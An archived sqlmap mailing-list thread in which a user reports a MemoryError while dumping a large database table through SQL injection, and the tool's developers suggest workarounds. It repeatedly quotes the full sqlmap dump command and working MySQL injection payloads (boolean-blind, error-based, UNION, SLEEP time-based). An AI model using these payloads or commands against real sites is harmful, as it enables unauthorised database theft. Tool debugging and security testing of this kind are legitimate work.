Thread: [sqlmap-users] Memory problems
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users
|
From: David G. <sk...@gm...> - 2011-01-27 19:40:54
|
# ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 -D nomes -T class --dump sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 16:58:05 [16:58:05] [DEBUG] cleaning up configuration parameters [16:58:05] [DEBUG] setting the HTTP timeout [16:58:05] [DEBUG] setting the HTTP Cookie header [16:58:05] [DEBUG] setting the HTTP method to POST [16:58:05] [DEBUG] creating HTTP requests opener object [16:58:05] [INFO] using '/home/kkk/sqlmap-dev/output/ www.vulnsite.com/session' as session file [16:58:05] [INFO] resuming injection data from session file [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file [16:58:05] [INFO] testing connection to the target url you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: POST Parameter: vulnparam Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: vulnparam=6 AND 5647=5647 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 4 to 7 columns Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: vulnparam=6 AND SLEEP(5) --- [16:58:06] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.3.2 back-end DBMS: MySQL 5.0 [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' [16:58:06] [INFO] read from file '/home/kkk/sqlmap-dev/output/ www.vulnsite.com/session': vulncolumns [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM nomes.class# [17:00:09] [DEBUG] performed 1 queries in 122 seconds [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the command line, the following text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.5 Operating system: posix Traceback (most recent call last): File "./sqlmap.py", line 83, in main start() File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in start action() File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in dumpTable entries = inject.getValue(query, blind=False, dump=True) File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue value = __goInband(query, expected, sort, resumeValue, unpack, dump) File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband data = parseUnionPage(output, expression, partial, None, sort) File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in parseUnionPage dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, logOutput)) MemoryError [*] shutting down at: 17:00:13 There are about 50,350 entries in the table and 48 columns.I tested the query manually, and returned a page with 600k of information.I think thatsqlmap did not support the amount of data...? David |
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:48:48
|
LOL (50,350 entries in the table and 48 columns) we'll try to make some tests regarding this and report accordingly. haven't planed this kind of "huge" data retrievals :) kr On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: > # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" > --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 > -D nomes -T class --dump > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 16:58:05 > > [16:58:05] [DEBUG] cleaning up configuration parameters > [16:58:05] [DEBUG] setting the HTTP timeout > [16:58:05] [DEBUG] setting the HTTP Cookie header > [16:58:05] [DEBUG] setting the HTTP method to POST > [16:58:05] [DEBUG] creating HTTP requests opener object > [16:58:05] [INFO] using > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file > [16:58:05] [INFO] resuming injection data from session file > [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > [16:58:05] [INFO] testing connection to the target url > you provided an HTTP Cookie header value. The target url provided its own > Cookie within the HTTP Set-Cookie header. Do you want to continue using the > HTTP Cookie values that you provided? [Y/n] > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: POST > Parameter: vulnparam > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: vulnparam=6 AND 5647=5647 > > Type: error-based > Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT > COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 > ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM > information_schema.tables GROUP BY x)a) > > Type: UNION query > Title: MySQL UNION query (NULL) - 4 to 7 columns > Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), > CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: vulnparam=6 AND SLEEP(5) > --- > > [16:58:06] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 5.3.2 > back-end DBMS: MySQL 5.0 > [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' > [16:58:06] [INFO] read from file > '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns > [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' > [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, > CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM > nomes.class# > [17:00:09] [DEBUG] performed 1 queries in 122 seconds > > [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run > with the latest development version from the Subversion repository. If the > exception persists, please send by e-mail to > sql...@li... the command line, the following text and > any information needed to reproduce the bug. The developers will try to > reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 83, in main > start() > File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in > start > action() > File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action > conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in > dumpTable > entries = inject.getValue(query, blind=False, dump=True) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue > value = __goInband(query, expected, sort, resumeValue, unpack, dump) > File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband > data = parseUnionPage(output, expression, partial, None, sort) > File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in > parseUnionPage > dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, > kb.injection.place, conf.parameters[kb.injection.place], expression, > logOutput)) > MemoryError > > [*] shutting down at: 17:00:13 > > There are about 50,350 entries in the table and 48 columns.I tested the > query manually, and returned a page with 600k of information.I think that > sqlmap did not support the amount of data...? > > David > > ------------------------------------------------------------------------------ > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > Finally, a world-class log management solution at an even better price-free! > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > February 28th, so secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsight-sfd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:55:30
|
http://mail.python.org/pipermail/mailman-users/2005-October/047436.html "A MemoryError exception is a built-in Python exception "Raised when an operation runs out of memory but the situation may still be rescued (by deleting some objects)." How many members does this list have? According to the FAQ, the largest list reported to date has 147,000 members and presumably works. Possibly something in the cPanel implementation or your particular installation limits this to a greater degree." now, this messes our concept a bit but we'll try to adapt. kr On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar <mir...@gm...> wrote: > LOL (50,350 entries in the table and 48 columns) > > we'll try to make some tests regarding this and report accordingly. > haven't planed this kind of "huge" data retrievals :) > > kr > > On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: >> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 >> -D nomes -T class --dump >> >> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >> http://sqlmap.sourceforge.net >> >> [*] starting at: 16:58:05 >> >> [16:58:05] [DEBUG] cleaning up configuration parameters >> [16:58:05] [DEBUG] setting the HTTP timeout >> [16:58:05] [DEBUG] setting the HTTP Cookie header >> [16:58:05] [DEBUG] setting the HTTP method to POST >> [16:58:05] [DEBUG] creating HTTP requests opener object >> [16:58:05] [INFO] using >> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >> [16:58:05] [INFO] resuming injection data from session file >> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >> [16:58:05] [INFO] testing connection to the target url >> you provided an HTTP Cookie header value. The target url provided its own >> Cookie within the HTTP Set-Cookie header. Do you want to continue using the >> HTTP Cookie values that you provided? [Y/n] >> sqlmap identified the following injection points with a total of 0 HTTP(s) >> requests: >> --- >> Place: POST >> Parameter: vulnparam >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: vulnparam=6 AND 5647=5647 >> >> Type: error-based >> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 >> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >> information_schema.tables GROUP BY x)a) >> >> Type: UNION query >> Title: MySQL UNION query (NULL) - 4 to 7 columns >> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), >> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: vulnparam=6 AND SLEEP(5) >> --- >> >> [16:58:06] [INFO] the back-end DBMS is MySQL >> >> web application technology: PHP 5.3.2 >> back-end DBMS: MySQL 5.0 >> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' >> [16:58:06] [INFO] read from file >> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' >> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM >> nomes.class# >> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >> >> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >> with the latest development version from the Subversion repository. If the >> exception persists, please send by e-mail to >> sql...@li... the command line, the following text and >> any information needed to reproduce the bug. The developers will try to >> reproduce the bug, fix it accordingly and get back to you. >> sqlmap version: 0.9-dev >> Python version: 2.6.5 >> Operating system: posix >> Traceback (most recent call last): >> File "./sqlmap.py", line 83, in main >> start() >> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in >> start >> action() >> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action >> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in >> dumpTable >> entries = inject.getValue(query, blind=False, dump=True) >> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue >> value = __goInband(query, expected, sort, resumeValue, unpack, dump) >> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband >> data = parseUnionPage(output, expression, partial, None, sort) >> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >> parseUnionPage >> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >> kb.injection.place, conf.parameters[kb.injection.place], expression, >> logOutput)) >> MemoryError >> >> [*] shutting down at: 17:00:13 >> >> There are about 50,350 entries in the table and 48 columns.I tested the >> query manually, and returned a page with 600k of information.I think that >> sqlmap did not support the amount of data...? >> >> David >> >> ------------------------------------------------------------------------------ >> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >> Finally, a world-class log management solution at an even better price-free! >> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >> February 28th, so secure your free ArcSight Logger TODAY! >> http://p.sf.net/sfu/arcsight-sfd2d >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: Miroslav S. <mir...@gm...> - 2011-01-27 20:04:19
|
in the mean time you can try to use these: --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve kr On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar <mir...@gm...> wrote: > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html > > "A MemoryError exception is a built-in Python exception "Raised when an > operation runs out of memory but the situation may still be rescued > (by deleting some objects)." > > How many members does this list have? According to the FAQ, the largest > list reported to date has 147,000 members and presumably works. > Possibly something in the cPanel implementation or your particular > installation limits this to a greater degree." > > now, this messes our concept a bit but we'll try to adapt. > > kr > > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar > <mir...@gm...> wrote: >> LOL (50,350 entries in the table and 48 columns) >> >> we'll try to make some tests regarding this and report accordingly. >> haven't planed this kind of "huge" data retrievals :) >> >> kr >> >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote: >>> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3 >>> -D nomes -T class --dump >>> >>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool >>> http://sqlmap.sourceforge.net >>> >>> [*] starting at: 16:58:05 >>> >>> [16:58:05] [DEBUG] cleaning up configuration parameters >>> [16:58:05] [DEBUG] setting the HTTP timeout >>> [16:58:05] [DEBUG] setting the HTTP Cookie header >>> [16:58:05] [DEBUG] setting the HTTP method to POST >>> [16:58:05] [DEBUG] creating HTTP requests opener object >>> [16:58:05] [INFO] using >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file >>> [16:58:05] [INFO] resuming injection data from session file >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file >>> [16:58:05] [INFO] testing connection to the target url >>> you provided an HTTP Cookie header value. The target url provided its own >>> Cookie within the HTTP Set-Cookie header. Do you want to continue using the >>> HTTP Cookie values that you provided? [Y/n] >>> sqlmap identified the following injection points with a total of 0 HTTP(s) >>> requests: >>> --- >>> Place: POST >>> Parameter: vulnparam >>> Type: boolean-based blind >>> Title: AND boolean-based blind - WHERE or HAVING clause >>> Payload: vulnparam=6 AND 5647=5647 >>> >>> Type: error-based >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1 >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM >>> information_schema.tables GROUP BY x)a) >>> >>> Type: UNION query >>> Title: MySQL UNION query (NULL) - 4 to 7 columns >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR), >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# >>> >>> Type: AND/OR time-based blind >>> Title: MySQL > 5.0.11 AND time-based blind >>> Payload: vulnparam=6 AND SLEEP(5) >>> --- >>> >>> [16:58:06] [INFO] the back-end DBMS is MySQL >>> >>> web application technology: PHP 5.3.2 >>> back-end DBMS: MySQL 5.0 >>> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes' >>> [16:58:06] [INFO] read from file >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns >>> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes' >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM >>> nomes.class# >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds >>> >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run >>> with the latest development version from the Subversion repository. If the >>> exception persists, please send by e-mail to >>> sql...@li... the command line, the following text and >>> any information needed to reproduce the bug. The developers will try to >>> reproduce the bug, fix it accordingly and get back to you. >>> sqlmap version: 0.9-dev >>> Python version: 2.6.5 >>> Operating system: posix >>> Traceback (most recent call last): >>> File "./sqlmap.py", line 83, in main >>> start() >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in >>> start >>> action() >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in >>> dumpTable >>> entries = inject.getValue(query, blind=False, dump=True) >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue >>> value = __goInband(query, expected, sort, resumeValue, unpack, dump) >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband >>> data = parseUnionPage(output, expression, partial, None, sort) >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in >>> parseUnionPage >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, >>> kb.injection.place, conf.parameters[kb.injection.place], expression, >>> logOutput)) >>> MemoryError >>> >>> [*] shutting down at: 17:00:13 >>> >>> There are about 50,350 entries in the table and 48 columns.I tested the >>> query manually, and returned a page with 600k of information.I think that >>> sqlmap did not support the amount of data...? >>> >>> David >>> >>> ------------------------------------------------------------------------------ >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! >>> Finally, a world-class log management solution at an even better price-free! >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires >>> February 28th, so secure your free ArcSight Logger TODAY! >>> http://p.sf.net/sfu/arcsight-sfd2d >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail / Jabber: miroslav.stampar (at) gmail.com >> Mobile: +385921010204 (HR 0921010204) >> PGP Key ID: 0xB5397B1B >> Location: Zagreb, Croatia >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: David G. <sk...@gm...> - 2011-01-28 15:03:17
|
--start and --stop are not working Sqlmap just ignore these parameter. i think when used with union injection technique, these parameters are ignored(??). tried with --start 1 and --stop 20. On Thu, Jan 27, 2011 at 6:04 PM, Miroslav Stampar < mir...@gm...> wrote: > in the mean time you can try to use these: > > --start=LIMITSTART First query output entry to retrieve > --stop=LIMITSTOP Last query output entry to retrieve > > kr > > On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar > <mir...@gm...> wrote: > > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html > > > > "A MemoryError exception is a built-in Python exception "Raised when an > > operation runs out of memory but the situation may still be rescued > > (by deleting some objects)." > > > > How many members does this list have? According to the FAQ, the largest > > list reported to date has 147,000 members and presumably works. > > Possibly something in the cPanel implementation or your particular > > installation limits this to a greater degree." > > > > now, this messes our concept a bit but we'll try to adapt. > > > > kr > > > > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar > > <mir...@gm...> wrote: > >> LOL (50,350 entries in the table and 48 columns) > >> > >> we'll try to make some tests regarding this and report accordingly. > >> haven't planed this kind of "huge" data retrievals :) > >> > >> kr > >> > >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> > wrote: > >>> # ./sqlmap.py --method post --cookie > "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" > >>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" > -v 3 > >>> -D nomes -T class --dump > >>> > >>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool > >>> http://sqlmap.sourceforge.net > >>> > >>> [*] starting at: 16:58:05 > >>> > >>> [16:58:05] [DEBUG] cleaning up configuration parameters > >>> [16:58:05] [DEBUG] setting the HTTP timeout > >>> [16:58:05] [DEBUG] setting the HTTP Cookie header > >>> [16:58:05] [DEBUG] setting the HTTP method to POST > >>> [16:58:05] [DEBUG] creating HTTP requests opener object > >>> [16:58:05] [INFO] using > >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file > >>> [16:58:05] [INFO] resuming injection data from session file > >>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file > >>> [16:58:05] [INFO] testing connection to the target url > >>> you provided an HTTP Cookie header value. The target url provided its > own > >>> Cookie within the HTTP Set-Cookie header. Do you want to continue using > the > >>> HTTP Cookie values that you provided? [Y/n] > >>> sqlmap identified the following injection points with a total of 0 > HTTP(s) > >>> requests: > >>> --- > >>> Place: POST > >>> Parameter: vulnparam > >>> Type: boolean-based blind > >>> Title: AND boolean-based blind - WHERE or HAVING clause > >>> Payload: vulnparam=6 AND 5647=5647 > >>> > >>> Type: error-based > >>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause > >>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT > >>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) > THEN 1 > >>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM > >>> information_schema.tables GROUP BY x)a) > >>> > >>> Type: UNION query > >>> Title: MySQL UNION query (NULL) - 4 to 7 columns > >>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL, > >>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS > CHAR), > >>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL# > >>> > >>> Type: AND/OR time-based blind > >>> Title: MySQL > 5.0.11 AND time-based blind > >>> Payload: vulnparam=6 AND SLEEP(5) > >>> --- > >>> > >>> [16:58:06] [INFO] the back-end DBMS is MySQL > >>> > >>> web application technology: PHP 5.3.2 > >>> back-end DBMS: MySQL 5.0 > >>> [16:58:06] [INFO] fetching columns for table 'class' on database > 'nomes' > >>> [16:58:06] [INFO] read from file > >>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns > >>> [16:58:06] [INFO] fetching entries for table 'class' on database > 'nomes' > >>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL, > >>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL > FROM > >>> nomes.class# > >>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds > >>> > >>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your > run > >>> with the latest development version from the Subversion repository. If > the > >>> exception persists, please send by e-mail to > >>> sql...@li... the command line, the following > text and > >>> any information needed to reproduce the bug. The developers will try to > >>> reproduce the bug, fix it accordingly and get back to you. > >>> sqlmap version: 0.9-dev > >>> Python version: 2.6.5 > >>> Operating system: posix > >>> Traceback (most recent call last): > >>> File "./sqlmap.py", line 83, in main > >>> start() > >>> File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, > in > >>> start > >>> action() > >>> File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in > action > >>> conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable()) > >>> File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line > 1189, in > >>> dumpTable > >>> entries = inject.getValue(query, blind=False, dump=True) > >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in > getValue > >>> value = __goInband(query, expected, sort, resumeValue, unpack, > dump) > >>> File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in > __goInband > >>> data = parseUnionPage(output, expression, partial, None, sort) > >>> File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in > >>> parseUnionPage > >>> dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, > >>> kb.injection.place, conf.parameters[kb.injection.place], expression, > >>> logOutput)) > >>> MemoryError > >>> > >>> [*] shutting down at: 17:00:13 > >>> > >>> There are about 50,350 entries in the table and 48 columns.I tested the > >>> query manually, and returned a page with 600k of information.I think > that > >>> sqlmap did not support the amount of data...? > >>> > >>> David > >>> > >>> > ------------------------------------------------------------------------------ > >>> Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > >>> Finally, a world-class log management solution at an even better > price-free! > >>> Download using promo code Free_Logger_4_Dev2Dev. Offer expires > >>> February 28th, so secure your free ArcSight Logger TODAY! > >>> http://p.sf.net/sfu/arcsight-sfd2d > >>> _______________________________________________ > >>> sqlmap-users mailing list > >>> sql...@li... > >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >>> > >>> > >> > >> > >> > >> -- > >> Miroslav Stampar > >> > >> E-mail / Jabber: miroslav.stampar (at) gmail.com > >> Mobile: +385921010204 (HR 0921010204) > >> PGP Key ID: 0xB5397B1B > >> Location: Zagreb, Croatia > >> > > > > > > > > -- > > Miroslav Stampar > > > > E-mail / Jabber: miroslav.stampar (at) gmail.com > > Mobile: +385921010204 (HR 0921010204) > > PGP Key ID: 0xB5397B1B > > Location: Zagreb, Croatia > > > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- David Gomes Guimarães |
|
From: Miroslav S. <mir...@gm...> - 2011-01-28 15:12:55
|
yes, Bernardo warned me about this yesterday night :) we'll try to find something kr On Fri, Jan 28, 2011 at 4:02 PM, David Guimaraes <sk...@gm...> wrote: > --start and --stop are not working > > Sqlmap just ignore these parameter. i think when used with union injection > technique, these parameters are ignored(??). tried with --start 1 and --stop > 20. > > > On Thu, Jan 27, 2011 at 6:04 PM, Miroslav Stampar > <mir...@gm...> wrote: >> >> in the mean time you can try to use these: >> >> --start=LIMITSTART First query output entry to retrieve >> --stop=LIMITSTOP Last query output entry to retrieve >> >> kr >> >> On Thu, Jan 27, 2011 at 8:55 PM, Miroslav Stampar >> <mir...@gm...> wrote: >> > http://mail.python.org/pipermail/mailman-users/2005-October/047436.html >> > >> > "A MemoryError exception is a built-in Python exception "Raised when an >> > operation runs out of memory but the situation may still be rescued >> > (by deleting some objects)." >> > >> > How many members does this list have? According to the FAQ, the largest >> > list reported to date has 147,000 members and presumably works. >> > Possibly something in the cPanel implementation or your particular >> > installation limits this to a greater degree." >> > >> > now, this messes our concept a bit but we'll try to adapt. >> > >> > kr >> > >> > On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar >> > <mir...@gm...> wrote: >> >> LOL (50,350 entries in the table and 48 columns) >> >> >> >> we'll try to make some tests regarding this and report accordingly. >> >> haven't planed this kind of "huge" data retrievals :) >> >> >> >> kr >> >> >> >> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> >> >> wrote: >> >>> # ./sqlmap.py --method post --cookie >> >>> "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6" >> >>> --data 